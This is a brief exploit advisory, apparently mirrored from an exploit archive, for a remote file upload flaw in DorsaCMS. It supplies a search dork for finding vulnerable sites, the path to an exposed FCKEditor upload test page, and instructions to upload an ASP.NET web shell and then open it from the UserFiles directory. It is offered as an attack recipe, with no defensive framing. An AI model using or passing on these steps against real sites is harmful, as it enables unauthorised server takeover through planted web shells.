id: 13104
date: 07/03/2010
title: DorsaCMS Remote File Upload Vulnerability
author: NetQurd
cves: 

=========================================
DorsaCMS Remote File Upload Vulnerability
=========================================


* By : NetQurd

*SPT : d3c0der , HIV Security Team
 
* Mail : NetQurd@Live.Com , NetQurd@AttackerZ.iR

*Web : Http://AttackerZ.iR

#####################################

*Home : www.dorsagroup.ir

*Dork : "Powered by DorsaCMS"

*Exploit :

http://site.com/FCKEditor/editor/filemanager/connectors/test.html

Use : ASP.Net

Upload Shell Or File

Go To The

http://site.com/UserFiles/File/shell-or-file.aspx

==================== --.Finished !!.-- =======================



#  0day.today [2023-03-24]  #